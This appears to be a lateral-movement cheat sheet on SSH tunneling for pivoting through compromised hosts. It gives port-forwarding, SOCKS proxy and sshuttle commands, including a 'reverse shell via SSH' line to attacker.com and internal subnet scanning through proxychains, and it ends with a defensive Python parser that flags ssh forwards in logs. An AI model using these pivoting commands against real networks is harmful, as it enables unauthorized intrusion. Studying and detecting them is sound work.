Lateral Movement | T1570
🔑 SSH Tunneling & Port Forwarding
🧠 Description
SSH tunneling creates encrypted tunnels for forwarding network traffic, enabling pivoting through compromised hosts and accessing internal services through encrypted channels.
🔀 Local Port Forwarding
# Forward local port 8080 to remote service via jump host
ssh -L 8080:internal-host:80 user@jump-server.com

# Forward local port 3389 to internal RDP
ssh -L 3389:internal-pc:3389 user@jump-server.com

# Multiple forwards
ssh -L 8080:webserver:80 -L 443:webserver:443 -L 3389:rdp-host:3389 user@jump.com

# With key
ssh -L 8080:target:80 -i key.pem user@jump.com
🔄 Remote Port Forwarding
# Forward remote port 9090 to local service
ssh -R 9090:localhost:8080 user@vps-server.com

# Bind to all interfaces
ssh -R 0.0.0.0:9090:localhost:8080 user@vps.com

# Reverse shell via SSH
ssh -R 4444:127.0.0.1:4444 user@attacker.com

# Proxy pivoting
ssh -R 1080:127.0.0.1:1080 user@proxy-server.com
🌐 Dynamic SOCKS Proxy
# Create SOCKS5 proxy on port 1080
ssh -D 1080 user@jump-server.com

# Configure browser to use 127.0.0.1:1080 as SOCKS proxy
# All traffic through SSH tunnel

# With proxychains
# Add to /etc/proxychains4.conf
# socks5 127.0.0.1 1080

# Use with tools
proxychains nmap -sT 10.10.10.0/24
proxychains firefox
🛠️ SSHuttle (Full Tunnel)
# Route all traffic for 10.0.0.0/8 through SSH
sshuttle -r user@jump-server.com 10.0.0.0/8

# Exclude a specific host or subnet
sshuttle -r user@jump.com 10.0.0.0/8 -x 10.10.10.50

# Route everything (0/0) and forward DNS
sshuttle -r user@jump.com 0/0 --dns

# As daemon
sshuttle -r user@jump.com 10.0.0.0/8 -D
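For the detection side, the following added example (not part of the original page) parses an ssh command line, such as one taken from process-creation or auditd execve logs, and reports each -L, -R and -D forward shown above, flagging listeners requested on a non-loopback address. The function names and the sample command lines are assumptions made for illustration; forwards set through `-o` or a config file are out of scope.

```python
import re
import shlex

# ssh options that take an argument, per ssh(1); all others are boolean flags.
ARG_OPTS = set("BbcDEeFIiJLlmOoPpQRSWw")
KIND = {"L": "local", "R": "remote", "D": "dynamic"}
LOOPBACK = {"localhost", "127.0.0.1", "[::1]"}

def bind_address(flag, spec):
    """Return the requested bind address, or None when ssh's default applies."""
    # Split on ':' except inside a bracketed IPv6 literal such as [::1].
    fields = re.split(r":(?![^\[]*\])", spec)
    has_bind = len(fields) == 4 or (
        flag in "DR" and len(fields) == 2 and fields[1].isdigit())
    return fields[0] if has_bind else None

def ssh_forwards(cmdline):
    """List (kind, spec, exposed) per forward; exposed = non-loopback bind requested."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return []
    found, seen_dest, i = [], False, 1
    while i < len(argv):
        tok = argv[i]
        i += 1
        if tok == "--":
            break
        if not tok.startswith("-") or tok == "-":
            if seen_dest:       # second bare word starts the remote command
                break
            seen_dest = True    # ssh still accepts options after the destination
            continue
        for pos, ch in enumerate(tok[1:], start=1):
            if ch not in ARG_OPTS:
                continue        # boolean flag such as -N or -f
            value = tok[pos + 1:]           # attached form: -L8080:host:80
            if not value and i < len(argv):
                value, i = argv[i], i + 1   # separate form: -L 8080:host:80
            if ch in KIND:
                bind = bind_address(ch, value)
                found.append((KIND[ch], value, bind is not None and bind not in LOOPBACK))
            break               # the rest of this token was the option's value
    return found

if __name__ == "__main__":
    # Constructed sample command lines, modelled on the forms listed above.
    for line in ("ssh -R 0.0.0.0:9090:localhost:8080 user@vps.com",
                 "ssh -fNL [::1]:8080:target:80 user@jump.com"):
        print(line, "->", ssh_forwards(line))
```

Whether a non-loopback `-R` bind is actually honoured depends on the server's `GatewayPorts` setting in `sshd_config`, so an `exposed` hit is a request to review rather than proof of an open listener.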